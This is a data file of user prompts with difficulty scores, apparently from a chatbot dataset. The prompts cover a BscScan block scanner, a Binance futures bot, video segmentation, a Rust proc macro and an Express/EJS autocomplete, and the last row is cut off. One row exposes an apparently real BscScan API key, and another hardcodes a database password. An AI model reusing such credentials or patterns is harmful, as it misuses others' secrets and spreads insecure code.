row_id
int64 0
48.4k
| init_message
stringlengths 1
342k
| conversation_hash
stringlengths 32
32
| scores
dict |
|---|---|---|---|
11,247
|
import asyncio
import aiohttp
import json
bscscan_api_key = 'CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS'
# Create a semaphore with a limit of n
semaphore = asyncio.Semaphore(5)
api_request_delay = 0.2 # Set a 200ms delay between API requests
async def get_external_transactions(block_number):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getBlockByNumber&tag={block_number}&boolean=true&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return []
if data['result'] is None or isinstance(data['result'], str):
print(f"Error: Cannot find the block")
return []
return data['result'].get('transactions', [])
async def get_contract_address(tx_hash):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getTransactionReceipt&txhash={tx_hash}&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return None
if data['result'] is None or not isinstance(data['result'], dict):
return None
return data['result'].get('contractAddress')
async def get_contract_verification_status(contract_address: str) -> bool:
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f"https://api.bscscan.com/api?module=contract&action=getabi&address={contract_address}&apikey={bscscan_api_key}"
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f"Error in API request: {e}")
return False
if data["result"] is None or not isinstance(data["result"], str):
return False
return data["result"] != "Contract source code not verified"
async def get_contract_abi(contract_address: str) -> str:
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f"https://api.bscscan.com/api?module=contract&action=getabi&address={contract_address}&apikey={bscscan_api_key}"
# Retry mechanism in case of failures
retries = 3
while retries > 0:
try:
await asyncio.sleep(api_request_delay)
async with session.get(url) as response:
data = await response.json()
if data["result"] is None or not isinstance(data["result"], str):
retries -= 1
continue
return data["result"]
except Exception as e:
print(f"Error in API request: {e}")
retries -= 1
return "" # Return an empty string if retries are exhausted
async def get_token_name_from_abi(contract_address: str) -> str:
abi_str = await get_contract_abi(contract_address)
if not abi_str: # empty string
return ""
try:
contract_abi = json.loads(abi_str)
for contract_item in contract_abi:
if contract_item.get("type") == "function" and contract_item.get("name") == "name":
return "YES"
return ""
except Exception as e:
print(f"Error parsing ABI: {e}")
return "NO"
def check_method_id(input_data):
method_id = input_data[:10]
return method_id[-4:] == '6040'
async def is_contract_verified(contract_address: str) -> bool:
return await get_contract_verification_status(contract_address)
async def display_transactions(block_start, block_end):
async def process_block(block_number_int):
block_number = hex(block_number_int)
transactions = await get_external_transactions(block_number)
if not transactions:
print(f'No transactions found in block {block_number_int}')
else:
print(f'Transactions in block {block_number_int}:')
for tx in transactions:
if tx["to"] is None:
if check_method_id(tx["input"]):
contract_address = await get_contract_address(tx["hash"])
if contract_address:
token_details_task = asyncio.gather(
get_contract_verification_status(contract_address),
get_token_name_from_abi(contract_address)
)
verified, token_name = await token_details_task
# Only display addresses with verified code and token name
if verified and token_name.startswith("YES"):
print(
f"New contract creation: Contract Address: {contract_address}, Token Name: {token_name}, Verified: {verified}")
print("\n") # Print an empty line between blocks
tasks = [process_block(block_number) for block_number in range(block_start, block_end + 1)]
await asyncio.gather(*tasks)
async def main():
block_start = 28866499 # Replace with your desired starting block number
block_end = 28866930 # Replace with your desired ending block number
await display_transactions(block_start, block_end)
try:
asyncio.run(main())
except Exception as e:
print(f"Error: {e}")
Change the code above to process the latest issued blocks in the blockchain, and not the blocks specified in the interval
|
c7e8119c492f937de70c8dac7bf0e123
|
{
"intermediate": 0.3581313490867615,
"beginner": 0.50846266746521,
"expert": 0.13340601325035095
}
|
11,248
|
Give me an example of recursive plsql query
|
703bdcf170d223590598b2448795088a
|
{
"intermediate": 0.42339786887168884,
"beginner": 0.22594182193279266,
"expert": 0.3506602942943573
}
|
11,249
|
Te voy a compartir un código de Python para que lo modifiques de maenra profesional y elegante, con el fin de que sea funcional pero la estructura sea distinta y se considere una obra original, acá está lo que debes mejorar con base a mis instrucciones.:
"import os
import av
import cv2
import torch
import easyocr
import numpy as np
import urllib.request
import matplotlib.pyplot as plt
from segment_anything import SamAutomaticMaskGenerator, sam_model_registry
def detect_objects_in_video(video_path, output_path):
"""
Detects objects in the given video and saves the results to the given output path
"""
# Download model weights
model_path = "sam_vit_h_4b8939.pth"
model_url = "https://dl.fbaipublicfiles.com/segment_anything/sam_vit_h_4b8939.pth"
if not os.path.exists(model_path):
urllib.request.urlretrieve(url, model_path)
print("Model Weights downloaded successfully.")
# Create the model
device = "cuda" if torch.cuda.is_available() else "cpu"
sam = sam_model_registry["vit_h"](checkpoint="sam_vit_h_4b8939.pth")
sam.to(device=device)
mask_generator = SamAutomaticMaskGenerator(sam)
reader = easyocr.Reader(["es"], gpu=torch.cuda.is_available())
# Open the video file using PyAV
container = av.open(video_path)
# Create the output directory
output_dir = os.path.split(output_path)[0]
img_dir = os.path.join(output_dir, "IMG")
os.makedirs(name=img_dir, exist_ok=True)
# Create the csv file
with open(output_path, "w") as f:
f.write("id,object_type,time,coordinates_text\n")
# Iterate over each frame in the video
for i, frame in enumerate(container.decode(video=0)):
time = frame.time
frame = frame.to_rgb().to_ndarray()
# Discard frames with a low variance of pixel values
# or with temporal proximity to the previous frame
if i % 100 == 0 and frame.var() > 3000:
segment_frame(frame, mask_generator, os.path.join(img_dir, f'{i:08d}.png'))
seconds = int(int(time) % 60)
minutes = int((time // 60) % 60)
hours = int(time // 3600)
coordinates = get_coordinates(reader, frame)
time = f"{hours:02d}:{minutes:02d}:{seconds:02d}"
# Append to the csv file
with open(output_path, "a") as f:
f.write(f"{i},object,{time},\"{coordinates}\"\n")
# Close the video file
container.close()
# Free memory
del sam
del mask_generator
del reader
def segment_frame(frame, mask_generator, savepath, top_n=15):
"""
Performs inference on the given frame and returns the segmentation masks
"""
# Generate the masks from SAM
masks = mask_generator.generate(frame)
# Sort the masks by confidence
confidences = list(map(lambda x:x["predicted_iou"], masks))
masks = list(map(lambda x:x[0], sorted(zip(masks, confidences), key=lambda x:x[1], reverse=True)))
# Save results
show_anns(frame, masks[:top_n], savepath)
def show_anns(frame, anns, savepath):
"""
Creates an image with the given annotations and saves it to the given path
"""
plt.figure(figsize=(20,20))
plt.imshow(frame)
if len(anns) == 0:
return
sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
ax = plt.gca()
ax.set_autoscale_on(False)
img = np.ones((sorted_anns[0]['segmentation'].shape[0], sorted_anns[0]['segmentation'].shape[1], 4))
img[:,:,3] = 0
for ann in sorted_anns:
m = ann['segmentation']
color_mask = np.concatenate([np.random.random(3), [0.35]])
img[m] = color_mask
ax.imshow(img)
plt.axis('off')
plt.savefig(savepath, bbox_inches='tight')
def get_coordinates(reader, frame):
"""
Returns the coordinates of the given frame
"""
result = reader.readtext(frame, paragraph=False)
text = " ".join(map(str, result))
"
No debe quedar ni la más minima señal del original, recuerda, que seae original y funcional
|
2e6eff00b3479d48fa87ffed414be996
|
{
"intermediate": 0.41318443417549133,
"beginner": 0.34164443612098694,
"expert": 0.24517109990119934
}
|
11,250
|
how to force selenium chrome to use specific network interface (lets say wifi) with python on windows?
|
2e8db8581f41b0fbada547bb211fd9ee
|
{
"intermediate": 0.35173532366752625,
"beginner": 0.18389247357845306,
"expert": 0.4643721580505371
}
|
11,251
|
come up with 10 solutions written in rust. requirements: strictly using only std library when possible. task: make proc macro using proc-macro2 crate that get into argument type of $str intentionally erroneous expression containing syntax error, that may cause parse error and panic, but we should handle and avoid it by any means with our solution writing in code. initial code to elaborate: fn main { let erroneous_expr_str = "unimplemented(;"; tokens_from_str(erroneous_expr_str); } fn tokens_from_str(stream: &str) -> TokenStream { //... this needs to elaborate with code, that determines if the "stream" is erroneous, yet not falling in panic or any error, just return empty token stream if the "stream" is erroneous or return stream converted in token stream if the "stream" is not erroneous}. start with several most effective solutions, proceed through several sophisticated uncompromisingly solving the task to the several completely different approaches that might or might not ignoring the requirements
|
be6c275a6670d029d738a2a513f2b9c9
|
{
"intermediate": 0.603796660900116,
"beginner": 0.22858035564422607,
"expert": 0.16762299835681915
}
|
11,252
|
I usd this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
server_time = int(exchange.fetch_time()['timestamp'])
return server_time
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
try:
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
except requests.exceptions.RequestException as e:
print(f'Error in get_klines: {e}')
return None
df = get_klines(symbol, '15m', 66240)
def signal_generator(df):
if df is None:
return ""
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '15m', 66240)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Adjust quantity if opposite position exists
if opposite_position is not None:
quantity = round_step_size(abs(float(opposite_position['positionAmt'])), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '15m', 66240) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(0.1)
But I getting ERROR: Error fetching markets: binance {"code":-1021,"msg":"Timestamp for this request was 1000ms ahead of the server's time."}
|
4858dcfa8f5c118d2269732b62e7db59
|
{
"intermediate": 0.40332138538360596,
"beginner": 0.42879724502563477,
"expert": 0.16788135468959808
}
|
11,253
|
what is the most important things I should know about html before I start learning css ?
|
97b4e8824407407a4e9816d0300ebc7c
|
{
"intermediate": 0.33512988686561584,
"beginner": 0.37399330735206604,
"expert": 0.2908768057823181
}
|
11,254
|
I have a pop up that opens every time i activate a particular sheet. I activate the sheet very often. Is there a way of preventing the popup from opening within the last 60 minutes it was last opened
|
c2d16426ec7f474d79bf09d3cc45adca
|
{
"intermediate": 0.4321288764476776,
"beginner": 0.2724526822566986,
"expert": 0.295418381690979
}
|
11,255
|
how do you self join this situation "Categories and subcategories are stored in one table. If a parent category is specified, it is a subcategory"
I want to return only categories with an array of their subcategories.
const categories = await this.categoryRepository.createQueryBuilder('category')
.leftJoinAndSelect('category.parentCategory', 'parentCategory')
.where('parentCategory.id = :parentCategoryId', { parentCategoryId })
.getMany();
|
8a20c5fa897286b0a71e8556cc40897a
|
{
"intermediate": 0.5728972554206848,
"beginner": 0.1992424875497818,
"expert": 0.22786030173301697
}
|
11,256
|
can you program in pinescript?
|
b56583e916c71881934aeca6ccfef0c2
|
{
"intermediate": 0.2520159184932709,
"beginner": 0.43183669447898865,
"expert": 0.31614741683006287
}
|
11,257
|
Мне нужно реализовать автокомплит со списком городов из базы данных такой же, как в search.ejs только при регистрации. Вот код:
const express = require("express");
const fs = require("fs");
const session = require("express-session");
const fileUpload = require("express-fileupload");
const app = express();
const fuzzball = require("fuzzball");
const mysql = require('mysql');
const connection = mysql.createConnection({
host: 'localhost',
user: 'music', // замените на свой логин
password: 'password', // замените на свой пароль
database: 'music' // замените на свою базу данных
});
connection.connect((err) => {
if (err) {
console.error('Ошибка подключения к базе данных: ', err);
} else {
console.log('Подключение к базе данных успешно');
}
});
app.set("view engine", "ejs");
app.use(express.static("public"));
app.use(express.urlencoded({ extended: true }));
app.use(fileUpload());
app.use(session({
secret: "mysecretkey",
resave: false,
saveUninitialized: false
}));
const citiesAndRegions = JSON.parse(fs.readFileSync("./db/russia.json", "utf8"));
const predefinedGenres = ['Rock', 'Pop', 'Jazz', 'Hip Hop', 'Electronic', 'Blues'];
function getMusicianById(id) {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
return musicians.musicians.find(musician => musician.id === id);
}
function requireLogin(req, res, next) {
if (req.session.musicianId) {
next();
} else {
res.redirect("/login");
}
}
function search(query = '', role = '', city = '') {
const data = fs.readFileSync('./db/musicians.json');
const musicians = JSON.parse(data).musicians.map(musician => {
return {
name: musician.name,
genre: musician.genre,
originalName: musician.name,
profileLink: `/profile/${musician.id}`,
thumbnail: musician.thumbnail,
soundcloud: musician.soundcloud,
role: musician.role,
city: musician.city
};
});
let results = [];
if (query || role || city) {
const lowerQuery = query.toLowerCase();
results = musicians.filter(musician => {
const nameScore = musician.name.toLowerCase().startsWith(lowerQuery) ? 2 : musician.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const genreScore = musician.genre.toLowerCase().startsWith(lowerQuery) ? 2 : musician.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
return (
nameScore + genreScore > 0 &&
(role === "" || musician.role === role) &&
(city === "" || (musician.city && musician.city.toLowerCase().trim() === city.toLowerCase().trim()))
//(city === "" || musician.city.toLowerCase() === city.toLowerCase())
);
}).sort((a, b) => {
const aNameScore = a.name.toLowerCase().startsWith(lowerQuery) ? 2 : a.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const bNameScore = b.name.toLowerCase().startsWith(lowerQuery) ? 2 : b.name.toLowerCase().includes(lowerQuery) ? 1 : 0;
const aGenreScore = a.genre.toLowerCase().startsWith(lowerQuery) ? 2 : a.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
const bGenreScore = b.genre.toLowerCase().startsWith(lowerQuery) ? 2 : b.genre.toLowerCase().includes(lowerQuery) ? 1 : 0;
// Sort by name score, then genre score, then location score (descending)
if (aNameScore + aGenreScore + a.location < bNameScore + bGenreScore + b.location) {
return 1;
} else if (aNameScore + aGenreScore + a.location > bNameScore + bGenreScore + b.location) {
return -1;
} else {
return 0;
}
});
// Remove duplicates
results = results.filter((result, index, self) =>
index === self.findIndex(r => (
r.name === result.name && r.genre === result.genre && r.city === result.city
))
);
}
return results;
}
app.use((req, res, next) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.locals.musician = musician;
res.locals.userLoggedIn = true;
res.locals.username = musician.name;
} else {
res.locals.userLoggedIn = false;
}
next();
});
app.get("/", (req, res) => {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
res.render("index", { musicians: musicians.musicians });
});
app.get("/autocomplete/cities", async (req, res) => {
const searchString = req.query.term;
connection.query(
"SELECT city FROM mytable WHERE city LIKE ?",
[searchString + '%'],
(error, results, fields) => {
if (error) {
console.error("Ошибка выполнения запроса: ", error);
res.status(500).send("Ошибка выполнения запроса");
} else {
const cities = results.map(row => row.city);
res.json(cities);
}
}
);
});
app.get("/register", (req, res) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.redirect("/profile/" + musician.id);
} else {
res.render("register", { citiesAndRegions, city:'' });
}
});
app.post("/register", (req, res) => {
if (req.session.musicianId) {
const musician = getMusicianById(req.session.musicianId);
res.redirect("/profile/" + musician.id);
} else {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
const newMusician = {
id: musicians.musicians.length + 1,
name: req.body.name,
genre: req.body.genre,
instrument: req.body.instrument,
soundcloud: req.body.soundcloud,
password: req.body.password,
role: req.body.role,
city: req.body.city,
login: req.body.login
};
if (req.files && req.files.thumbnail) {
const file = req.files.thumbnail;
const filename = "musician_" + newMusician.id + "_" + file.name;
file.mv("./public/img/" + filename);
newMusician.thumbnail = filename;
}
const found = citiesAndRegions.find(
({ city }) => city === req.body.city.toLowerCase()
);
// Если найдено - сохраняем город и регион, если нет - оставляем только город
if (found) {
newMusician.city = found.city;
newMusician.region = found.region;
} else {
newMusician.city = req.body.city;
newMusician.region = "";
}
musicians.musicians.push(newMusician);
fs.writeFileSync("./db/musicians.json", JSON.stringify(musicians));
req.session.musicianId = newMusician.id;
res.redirect("/profile/" + newMusician.id);
}
});
app.get("/profile/:id", (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
res.render("profile", { musician: musician });
} else {
res.status(404).send("Musician not found");
}
});
app.get("/login", (req, res) => {
res.render("login");
});
app.post("/login", (req, res) => {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
const musician = musicians.musicians.find(musician => musician.login === req.body.login && musician.password === req.body.password);
if (musician) {
req.session.musicianId = musician.id;
res.redirect("/profile/" + musician.id);
} else {
res.render("login", { error: "Invalid login or password" });
}
});
app.get("/logout", (req, res) => {
req.session.destroy();
res.redirect("/");
});
app.get('/search', (req, res) => {
const query = req.query.query || '';
const role = req.query.role || '';
const city = req.query.city || '';
let musicians = [];
if (query || role || city) {
musicians = search(query, role, city);
} else {
const data = fs.readFileSync('./db/musicians.json');
musicians = JSON.parse(data).musicians.map(musician => {
return {
name: musician.name,
genre: musician.genre,
originalName: musician.name,
profileLink: `/profile/${musician.id}`,
thumbnail: musician.thumbnail,
soundcloud: musician.soundcloud,
role: musician.role,
city: musician.city
};
});
}
res.locals.predefinedGenres = predefinedGenres;
app.locals.JSON = JSON;
res.render('search', { musicians, query, role, city, citiesAndRegions});
//res.redirect('/search');
});
app.get("/profile/:id/edit", requireLogin, (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
if (req.session.musicianId === musician.id) { // Check if the logged-in user is the owner of the profile
res.render("edit-profile", { musician: musician });
} else {
res.status(403).send("Access denied");
}
} else {
res.status(404).send("Musician not found");
}
});
app.post('/profile/:id/edit', requireLogin, (req, res) => {
const musician = getMusicianById(parseInt(req.params.id));
if (musician) {
if (!req.body.name || !req.body.genre) {
res.status(400).send('Please fill out all fields');
} else {
musician.name = req.body.name;
musician.genre = req.body.genre;
musician.instrument = req.body.instrument;
musician.soundcloud = req.body.soundcloud;
musician.soundcloud1 = req.body.soundcloud1;
musician.soundcloud2 = req.body.soundcloud2;
musician.location = req.body.location;
musician.role = req.body.role;
musician.bio = req.body.bio;
if (req.files && req.files.thumbnail) {
const file = req.files.thumbnail;
const filename = 'musician_' + musician.id + '_' + file.name;
file.mv('./public/img/' + filename);
musician.thumbnail = filename;
}
const data = fs.readFileSync('./db/musicians.json');
const musicians = JSON.parse(data);
const index = musicians.musicians.findIndex(m => m.id === musician.id);
musicians.musicians[index] = musician;
fs.writeFileSync('./db/musicians.json', JSON.stringify(musicians));
res.redirect('/profile/' + musician.id);
}
} else {
res.status(404).send('Musician not found');
}
});
function isValidSoundCloudUrl(url) {
return url.startsWith('https://soundcloud.com/');
}
app.listen(3000, () => {
console.log("Server started on port 3000");
});
search.ejs:
<!DOCTYPE html>
<html>
<head>
<title>Search Musicians</title>
<link rel="stylesheet" href="/jquery-ui/themes/base/all.css" />
<script src="/jquery/dist/jquery.min.js"></script>
<script src="/jquery-ui/dist/jquery-ui.min.js"></script>
</head>
<body>
<h1>Search Musicians</h1>
<form action="/search" method="get">
<label for="query">Search by name or genre:</label> <input id="query" name="query" type="text" value="<%= query %>"><br>
<br>
<label for="role">Search by role:</label> <select id="role" name="role">
<option value="">
All
</option>
<option value="Band">
Band
</option>
<option value="Artist">
Artist
</option>
</select>
<label for="city">Search by location:</label>
<input id="city" name="city" type="text" autocomplete="on" value="<%= city %>" data-value="">
<br>
<!-- Add new input field for location -->
<br>
<br>
<button type="submit">Search</button>
</form><%if (musicians.length > 0) { %>
<h2>Results:</h2>
<ul>
<%musicians.forEach(musician => { %>
<li>
<a href="<%= musician.profileLink %>"><%= musician.name %> <%if (musician.thumbnail) { %> <img src="/img/<%= musician.thumbnail %>" alt="<%= musician.name %>"> <%} %></a> - <%= musician.genre %> - <%= musician.location %> <%if (musician.soundcloud) { %> <a href="%3C%=%20musician.soundcloud%20%%3E">SoundCloud</a> <%} %>
</li><%}); %>
</ul><%} else if (query || role) { %>
<p>No musicians found.</p><%} %>
<script>
$("#city").autocomplete({
source: '/autocomplete/cities',
minLength: 1,
});
const queryInput = document.querySelector("#query");
const roleInput = document.querySelector("#role");
const cityInput = document.querySelector("#city");
queryInput.value = "<%= query %>";
roleInput.value = "<%= role %>";
cityInput.value = cityInput.getAttribute('data-value');
const query = queryInput.value;
const role = roleInput.value;
const city = cityInput.value;
</script>
</body>
</html>
register.ejs (здесь надо реализовать автокомплит):
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<link rel="stylesheet" href="/css/main.css" />
<link rel="stylesheet" href="/node_modules/jquery-ui/themes/base/all.css" />
<script src="/node_modules/jquery/dist/jquery.min.js"></script>
<script src="/node_modules/jquery-ui-dist/jquery-ui.min.js"></script>
<title>Register as a Musician</title>
</head>
<body>
<header>
<nav>
<ul>
<li><a href="/">Home</a></li>
<li><a href="/register">Register</a></li>
<li><a href="/search">Search</a></li>
</ul>
</nav>
</header>
<main>
<h1>Register as a Musician</h1>
<form method="post" enctype="multipart/form-data">
<label for="name">Name</label>
<input type="text" id="name" name="name" required>
<label for="role">Role</label>
<select id="role" name="role" required onchange="showInstrument(this.value)">
<option value="">Select a role</option>
<option value="Band">A band</option>
<option value="Artist">Artist</option>
</select>
<label for="genre">Genre</label>
<select id="genre" name="genre" required>
<option value="">Select a genre</option>
<option value="Rock">Rock</option>
<option value="Pop">Pop</option>
<option value="Hip hop">Hip hop</option>
<option value="Electronic">Electronic</option>
</select>
<label for="instrument" id="instrument-label" style="display: none">Instrument</label>
<select id="instrument" name="instrument" style="display: none">
<option value="">Select a instrument</option>
<option value="Bass">Bass</option>
<option value="Rythm guitar">Rythm guitar</option>
<option value="Lead guitar">Lead guitar</option>
<option value="Vocal">Vocal</option>
</select>
<label for="soundcloud">SoundCloud URL</label>
<input type="url" id="soundcloud" name="soundcloud">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
<label for="city">City:</label>
<input id="city" name="city" type="text" value="<%= citiesAndRegions[0].city %>"><br />
<label for="login">Login</label>
<input type="text" id="login" name="login" required>
<label for="thumbnail">Thumbnail</label>
<input type="file" id="thumbnail" name="thumbnail">
<button type="submit">Register</button>
</form>
</main>
<script>
function showInstrument(role) {
const instrumentLabel = document.querySelector('#instrument-label');
const instrumentSelect = document.querySelector('#instrument');
if (role === 'Artist') {
instrumentLabel.style.display = 'block';
instrumentSelect.style.display = 'block';
} else {
instrumentLabel.style.display = 'none';
instrumentSelect.style.display = 'none';
}
}
</script>
<script>
(function () {
const cities = <%= JSON.stringify(citiesAndRegions.map(item => item.city)) %>;
("#city").autocomplete({
source: cities,
minLength: 3,
});
});
</script>
</body>
</html>
|
684a5435989194c762fc28adf8cce9f0
|
{
"intermediate": 0.3877393305301666,
"beginner": 0.5134510397911072,
"expert": 0.09880967438220978
}
|
11,258
|
Мне нужно реализовать автокомплит со списком городов из базы данных такой же, как в search.ejs только при регистрации. Вот код:
const express = require("express");
const fs = require("fs");
const session = require("express-session");
const fileUpload = require("express-fileupload");
const app = express();
const fuzzball = require("fuzzball");
const mysql = require('mysql');
const connection = mysql.createConnection({
host: 'localhost',
user: 'music', // замените на свой логин
password: 'password', // замените на свой пароль
database: 'music' // замените на свою базу данных
});
connection.connect((err) => {
if (err) {
console.error('Ошибка подключения к базе данных: ', err);
} else {
console.log('Подключение к базе данных успешно');
}
});
app.set("view engine", "ejs");
app.use(express.static("public"));
app.use(express.urlencoded({ extended: true }));
app.use(fileUpload());
app.use(session({
secret: "mysecretkey",
resave: false,
saveUninitialized: false
}));
const citiesAndRegions = JSON.parse(fs.readFileSync("./db/russia.json", "utf8"));
const predefinedGenres = ['Rock', 'Pop', 'Jazz', 'Hip Hop', 'Electronic', 'Blues'];
function getMusicianById(id) {
const data = fs.readFileSync("./db/musicians.json");
const musicians = JSON.parse(data);
return musicians.musicians.find(musician => musician.id === id);
}
function requireLogin(req, res, next) {
if (req.session.musicianId) {
next();
} else {
res.redirect("/login");
}
}
function search(query = '', role = '', city = '') {
const data = fs.readFileSync('./db/musicians.json');
const musicians = JSON.parse(data).musicians.map(musician => {
